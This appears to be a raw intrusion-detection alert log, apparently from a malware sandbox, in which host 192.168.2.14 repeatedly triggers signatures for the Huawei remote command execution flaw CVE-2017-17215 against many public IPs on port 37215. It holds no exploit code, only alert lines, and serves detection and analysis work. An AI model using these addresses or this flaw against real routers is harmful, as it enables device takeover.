                                            06/14/24-10:43:58.292351TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4108037215192.168.2.1441.98.180.15
                                            06/14/24-10:44:04.411640TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5397037215192.168.2.14197.101.187.95
                                            06/14/24-10:44:06.471881TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5552037215192.168.2.14156.57.210.77
                                            06/14/24-10:43:34.662156TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4975237215192.168.2.14197.165.171.189
                                            06/14/24-10:44:08.504591TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3426637215192.168.2.1441.166.125.160
                                            06/14/24-10:43:36.701098TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4522437215192.168.2.14197.84.85.34
                                            06/14/24-10:44:02.383555TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4211237215192.168.2.14197.195.0.218
                                            06/14/24-10:44:10.546496TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4778837215192.168.2.1441.242.23.150
                                            06/14/24-10:44:18.760999TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5065837215192.168.2.14156.227.163.148
                                            06/14/24-10:44:02.369269TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4802637215192.168.2.14197.217.53.197
                                            06/14/24-10:44:12.617538TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5381037215192.168.2.14156.241.164.114
                                            06/14/24-10:44:02.365748TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5180437215192.168.2.14156.105.14.201
                                            06/14/24-10:44:22.880990TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3346237215192.168.2.14197.199.214.47
                                            06/14/24-10:44:04.407515TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5775637215192.168.2.14197.98.234.184
                                            06/14/24-10:44:29.011930TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5912637215192.168.2.1441.110.205.14
                                            06/14/24-10:44:08.505025TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5480037215192.168.2.14197.234.142.18
                                            06/14/24-10:43:52.146748TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3752637215192.168.2.14156.234.158.94
                                            06/14/24-10:44:31.088957TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4880037215192.168.2.14197.41.12.187
                                            06/14/24-10:43:52.164008TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5006637215192.168.2.14156.114.62.203
                                            06/14/24-10:43:50.074230TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4450837215192.168.2.14197.54.140.226
                                            06/14/24-10:44:24.944141TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4383237215192.168.2.14156.222.150.92
                                            06/14/24-10:43:45.984210TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4918837215192.168.2.1441.99.214.149
                                            06/14/24-10:44:02.368414TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4799037215192.168.2.14156.114.230.108
                                            06/14/24-10:43:48.018479TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4359237215192.168.2.14197.118.41.65
                                            06/14/24-10:43:56.230315TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3983237215192.168.2.14197.97.172.55
                                            06/14/24-10:44:08.505082TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3605637215192.168.2.1441.141.20.226
                                            06/14/24-10:44:35.180054TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4505037215192.168.2.14156.119.248.142
                                            06/14/24-10:43:37.761099TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4875837215192.168.2.14197.77.45.169
                                            06/14/24-10:43:58.275303TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4724237215192.168.2.14197.208.183.13
                                            06/14/24-10:44:20.804177TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5308037215192.168.2.14197.238.230.210
                                            06/14/24-10:44:29.011582TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5625637215192.168.2.14156.177.38.118
                                            06/14/24-10:44:26.999845TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4284637215192.168.2.14156.232.55.57
                                            06/14/24-10:44:12.615854TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5211237215192.168.2.1441.54.37.136
                                            06/14/24-10:43:54.183164TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4213637215192.168.2.14156.6.74.138
                                            06/14/24-10:44:29.027420TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5516837215192.168.2.14197.41.51.67
                                            06/14/24-10:43:54.200852TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3358237215192.168.2.14156.2.242.180
                                            06/14/24-10:44:06.453508TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4391037215192.168.2.14197.71.179.53
                                            06/14/24-10:43:48.028098TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4349237215192.168.2.1441.249.84.153
                                            06/14/24-10:44:18.766858TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4122037215192.168.2.14156.225.144.59
                                            06/14/24-10:44:12.618427TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3775637215192.168.2.14197.178.91.187
                                            06/14/24-10:44:14.671062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3481237215192.168.2.1441.217.107.140
                                            06/14/24-10:44:27.001582TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4035237215192.168.2.14197.153.196.250
                                            06/14/24-10:44:18.764102TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3696437215192.168.2.1441.46.252.124
                                            06/14/24-10:44:02.365813TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4415037215192.168.2.14197.216.234.10
                                            06/14/24-10:44:04.423545TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4089637215192.168.2.14156.82.112.171
                                            06/14/24-10:43:48.032487TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5548637215192.168.2.1441.117.89.203
                                            06/14/24-10:43:52.149114TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4326237215192.168.2.14156.251.212.201
                                            06/14/24-10:44:24.914626TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4288037215192.168.2.1441.1.131.219
                                            06/14/24-10:44:08.501917TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3473437215192.168.2.1441.176.88.46
                                            06/14/24-10:44:14.688207TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3290037215192.168.2.14156.231.88.177
                                            06/14/24-10:44:24.913993TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4968037215192.168.2.1441.45.106.89
                                            06/14/24-10:44:29.025107TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5468037215192.168.2.1441.98.252.198
                                            06/14/24-10:44:04.411137TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4459637215192.168.2.14156.74.122.245
                                            06/14/24-10:43:54.184984TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3636637215192.168.2.14156.70.192.24
                                            06/14/24-10:43:37.772496TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4690037215192.168.2.1441.7.148.192
                                            06/14/24-10:44:22.879695TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4863837215192.168.2.14156.57.49.151
                                            06/14/24-10:43:48.019425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5835237215192.168.2.14197.226.170.21
                                            06/14/24-10:44:22.878423TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4339837215192.168.2.14197.89.56.246
                                            06/14/24-10:43:58.276029TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4582237215192.168.2.1441.190.115.249
                                            06/14/24-10:43:52.165201TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4296037215192.168.2.14156.190.185.170
                                            06/14/24-10:44:24.914318TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3960037215192.168.2.14156.105.236.126
                                            06/14/24-10:44:06.470804TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3638437215192.168.2.1441.113.186.94
                                            06/14/24-10:44:12.613897TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4559637215192.168.2.14197.227.2.72
                                            06/14/24-10:44:18.777845TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4658037215192.168.2.14156.247.120.161
                                            06/14/24-10:44:04.420809TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5561837215192.168.2.14156.152.34.152
                                            06/14/24-10:43:54.184440TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4678837215192.168.2.14197.130.1.193
                                            06/14/24-10:44:00.319833TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5160237215192.168.2.1441.129.151.15
                                            06/14/24-10:43:58.293373TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5387237215192.168.2.14156.62.45.84
                                            06/14/24-10:44:04.409368TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5575437215192.168.2.14156.83.74.32
                                            06/14/24-10:44:14.667165TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5343037215192.168.2.1441.41.229.92
                                            06/14/24-10:43:50.111755TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3424437215192.168.2.14156.156.180.210
                                            06/14/24-10:44:00.344357TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4201437215192.168.2.1441.234.167.47
                                            06/14/24-10:44:35.180621TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4827437215192.168.2.14197.140.5.173
                                            06/14/24-10:43:34.660644TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4495037215192.168.2.1441.203.38.182
                                            06/14/24-10:44:10.563718TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5237237215192.168.2.14197.236.37.36
                                            06/14/24-10:44:02.381198TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5513637215192.168.2.14156.153.68.109
                                            06/14/24-10:43:50.110612TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5763437215192.168.2.1441.189.233.144
                                            06/14/24-10:43:36.726702TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3292637215192.168.2.14197.246.63.1
                                            06/14/24-10:43:41.845959TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3502437215192.168.2.14197.12.252.127
                                            06/14/24-10:43:56.229019TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5317237215192.168.2.14156.122.23.207
                                            06/14/24-10:44:04.405640TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5785637215192.168.2.14197.209.211.133
                                            06/14/24-10:43:41.849511TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5354237215192.168.2.14197.36.39.45
                                            06/14/24-10:43:52.148997TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4275637215192.168.2.1441.94.78.243
                                            06/14/24-10:44:12.640861TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3575237215192.168.2.1441.153.208.230
                                            06/14/24-10:44:10.563492TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4916437215192.168.2.14156.153.215.32
                                            06/14/24-10:44:18.765649TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4545637215192.168.2.1441.244.19.214
                                            06/14/24-10:43:56.228032TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4626437215192.168.2.14197.230.13.78
                                            06/14/24-10:44:02.366806TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5744837215192.168.2.14197.95.58.58
                                            06/14/24-10:44:14.666442TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5187237215192.168.2.1441.23.53.214
                                            06/14/24-10:43:37.759163TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5038837215192.168.2.1441.73.4.229
                                            06/14/24-10:43:48.020687TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3989037215192.168.2.1441.62.107.245
                                            06/14/24-10:44:20.829276TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3435237215192.168.2.1441.242.111.248
                                            06/14/24-10:43:54.200351TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5395437215192.168.2.1441.85.2.124
                                            06/14/24-10:43:39.789027TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5974837215192.168.2.14156.5.45.169
                                            06/14/24-10:44:29.011291TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4016637215192.168.2.14197.215.143.210
                                            06/14/24-10:43:39.809442TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4291237215192.168.2.1441.52.240.124
                                            06/14/24-10:43:56.228162TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4160637215192.168.2.14156.83.238.127
                                            06/14/24-10:43:34.677827TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5231837215192.168.2.14197.20.145.2
                                            06/14/24-10:43:52.164073TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3548637215192.168.2.1441.79.58.87
                                            06/14/24-10:44:24.914437TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3502237215192.168.2.14197.64.43.27
                                            06/14/24-10:44:31.078411TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4296637215192.168.2.14197.179.219.101
                                            06/14/24-10:44:33.152277TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5316637215192.168.2.14156.47.78.36
                                            06/14/24-10:43:52.149565TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4846637215192.168.2.1441.114.142.13
                                            06/14/24-10:44:22.882102TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3473437215192.168.2.1441.223.39.145
                                            06/14/24-10:43:54.185586TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3772637215192.168.2.14197.143.79.142
                                            06/14/24-10:44:10.543446TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5009437215192.168.2.1441.179.40.107
                                            06/14/24-10:43:52.149797TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5111637215192.168.2.14197.116.112.87
                                            06/14/24-10:44:35.179376TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5653037215192.168.2.14156.94.186.64
                                            06/14/24-10:43:45.967363TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4943037215192.168.2.1441.66.130.46
                                            06/14/24-10:43:37.761174TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5845037215192.168.2.14197.183.73.141
                                            06/14/24-10:43:58.288692TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4637837215192.168.2.1441.229.0.119
                                            06/14/24-10:44:22.861437TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4810837215192.168.2.1441.183.230.102
                                            06/14/24-10:43:58.275159TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4502837215192.168.2.1441.144.79.112
                                            06/14/24-10:43:37.761323TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4041437215192.168.2.14156.152.22.243
                                            06/14/24-10:43:39.790238TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4517837215192.168.2.1441.166.37.52
                                            06/14/24-10:44:08.520707TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4803037215192.168.2.1441.115.149.214
                                            06/14/24-10:43:54.200747TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5337437215192.168.2.1441.173.186.230
                                            06/14/24-10:43:36.702888TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3455437215192.168.2.14156.82.229.143
                                            06/14/24-10:43:36.699588TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3385837215192.168.2.1441.248.249.197
                                            06/14/24-10:44:12.646383TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4937637215192.168.2.14197.197.202.177
                                            06/14/24-10:43:50.111055TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3487237215192.168.2.1441.203.141.46
                                            06/14/24-10:43:58.275904TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3596037215192.168.2.14197.124.169.53
                                            06/14/24-10:44:16.734384TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3694837215192.168.2.14156.108.193.115
                                            06/14/24-10:43:45.991510TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3729037215192.168.2.14197.39.51.26
                                            06/14/24-10:44:18.779301TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3590637215192.168.2.14197.124.152.157
                                            06/14/24-10:44:33.132164TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4174837215192.168.2.1441.90.112.128
                                            06/14/24-10:43:52.160491TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5252237215192.168.2.14156.156.78.21
                                            06/14/24-10:44:06.471970TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4877837215192.168.2.14156.246.200.2
                                            06/14/24-10:44:12.644829TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3400237215192.168.2.14156.245.87.132
                                            06/14/24-10:43:36.702948TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3304437215192.168.2.1441.218.186.212
                                            06/14/24-10:44:31.057425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5294437215192.168.2.14156.130.21.87
                                            06/14/24-10:43:50.073458TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6066237215192.168.2.14197.193.146.137
                                            06/14/24-10:44:20.807275TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4355637215192.168.2.1441.243.93.185
                                            06/14/24-10:44:10.546227TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5826237215192.168.2.14156.20.114.61
                                            06/14/24-10:44:27.002291TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5085637215192.168.2.14197.20.131.15
                                            06/14/24-10:44:10.567618TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4557637215192.168.2.14197.74.245.44
                                            06/14/24-10:44:14.669882TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4713437215192.168.2.14156.226.5.126
                                            06/14/24-10:44:20.806920TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4811037215192.168.2.14197.213.193.91
                                            06/14/24-10:43:54.202973TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5323637215192.168.2.1441.231.133.23
                                            06/14/24-10:44:10.568347TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4000437215192.168.2.14197.27.63.2
                                            06/14/24-10:43:50.073491TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5416437215192.168.2.1441.55.177.187
                                            06/14/24-10:43:34.678980TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3691237215192.168.2.14156.87.220.158
                                            06/14/24-10:44:12.646687TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5258637215192.168.2.14156.68.174.209
                                            06/14/24-10:44:31.083871TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5162837215192.168.2.1441.108.2.173
                                            06/14/24-10:43:43.944794TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3756237215192.168.2.14197.176.130.138
                                            06/14/24-10:43:58.274546TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4468637215192.168.2.14156.189.83.132
                                            06/14/24-10:44:12.640762TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5456037215192.168.2.14156.198.81.166
                                            06/14/24-10:43:34.662023TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5295237215192.168.2.14197.33.230.71
                                            06/14/24-10:43:45.984357TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5359437215192.168.2.1441.73.209.107
                                            06/14/24-10:44:12.646314TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4996837215192.168.2.1441.184.68.200
                                            06/14/24-10:43:56.229886TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3965037215192.168.2.14197.249.216.45
                                            06/14/24-10:44:22.878966TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4878037215192.168.2.14197.86.188.21
                                            06/14/24-10:44:20.830494TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5034837215192.168.2.14156.27.8.3
                                            06/14/24-10:44:22.860184TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5665837215192.168.2.1441.132.237.230
                                            06/14/24-10:44:16.732238TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4838837215192.168.2.14197.165.172.194
                                            06/14/24-10:43:50.111161TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6083037215192.168.2.14156.221.18.151
                                            06/14/24-10:43:54.183084TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6090837215192.168.2.14197.63.83.241
                                            06/14/24-10:44:22.858871TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4838237215192.168.2.1441.164.209.227
                                            06/14/24-10:44:04.420638TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6033637215192.168.2.14156.116.4.46
                                            06/14/24-10:43:34.679500TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4046237215192.168.2.1441.137.106.91
                                            06/14/24-10:44:06.453337TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4820437215192.168.2.1441.125.18.169
                                            06/14/24-10:44:14.667399TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5578837215192.168.2.14197.163.5.191
                                            06/14/24-10:43:39.813025TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4714837215192.168.2.14156.117.51.135
                                            06/14/24-10:44:08.519824TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5604037215192.168.2.14156.152.137.8
                                            06/14/24-10:43:41.850352TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4316037215192.168.2.14156.77.171.85
                                            06/14/24-10:43:34.679206TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4164637215192.168.2.14197.3.132.219
                                            06/14/24-10:43:45.967742TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4267837215192.168.2.14197.97.215.84
                                            06/14/24-10:43:39.807989TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5916037215192.168.2.14197.45.248.216
                                            06/14/24-10:44:02.383006TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4923437215192.168.2.14197.115.37.60
                                            06/14/24-10:43:43.970623TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5723437215192.168.2.14197.165.144.181
                                            06/14/24-10:43:36.704046TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4204637215192.168.2.1441.147.3.74
                                            06/14/24-10:44:06.452189TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3750037215192.168.2.1441.235.210.222
                                            06/14/24-10:44:00.326591TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5361037215192.168.2.1441.143.101.125
                                            06/14/24-10:43:58.289613TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5451437215192.168.2.14156.166.115.99
                                            06/14/24-10:43:58.294296TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4442637215192.168.2.1441.95.55.56
                                            06/14/24-10:43:34.663014TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4815837215192.168.2.14156.99.70.130
                                            06/14/24-10:44:08.521632TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5468437215192.168.2.14197.208.197.236
                                            06/14/24-10:44:31.087800TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4386837215192.168.2.1441.245.53.22
                                            06/14/24-10:44:26.997114TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3284437215192.168.2.14156.250.5.23
                                            06/14/24-10:44:04.410693TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3573637215192.168.2.14156.211.251.248
                                            06/14/24-10:44:29.025132TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5074237215192.168.2.14156.26.70.41
                                            06/14/24-10:43:56.225793TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5404237215192.168.2.14197.254.228.190
                                            06/14/24-10:44:24.947040TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4624637215192.168.2.1441.188.61.137
                                            06/14/24-10:44:22.883187TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3817237215192.168.2.1441.123.153.225
                                            06/14/24-10:44:31.052924TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5372437215192.168.2.14197.45.178.208
                                            06/14/24-10:43:48.019150TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3561037215192.168.2.1441.187.75.0
                                            06/14/24-10:43:52.143188TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5015437215192.168.2.1441.137.98.72
                                            06/14/24-10:43:36.703533TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5606837215192.168.2.1441.235.16.172
